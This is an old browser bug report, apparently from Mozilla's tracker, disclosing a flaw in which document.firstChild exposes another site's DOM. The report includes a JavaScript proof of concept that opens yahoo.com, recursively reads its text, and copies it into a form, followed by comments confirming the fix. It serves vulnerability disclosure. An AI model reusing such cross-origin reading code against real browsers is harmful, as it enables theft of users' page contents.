document.firstChild vulnerability
Description joro 1999-11-16 07:27:45 PST
document.firstChild exposes the DOM of arbitrary document which at least allows reading documents. The code is: --------------------------------------------------------------------------- function f(o) { var s=''; var i; s = o.nodeValue; if ( o.childNodes ) for ( i = 0; i < o.childNodes.length; i++ ) s += f(o.childNodes[i]); return s; } a=window.open("http://www.yahoo.com","victim"); function g() { document.forms[0].elements[0].value=f(a.document.firstChild); } setTimeout("g()",10000); ---------------------------------------------------------------------------
Comment 1 Norris Boyd 1999-11-22 12:01:59 PST
This is fixed with my Friday night checkin of all.js.
Comment 2 dshea 1999-12-02 14:45:59 PST
Windows NT 1999120208 Comm Verified ...'[Exception... "Security error"'...
Comment 3 leger 2000-02-21 10:29:15 PST
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
	
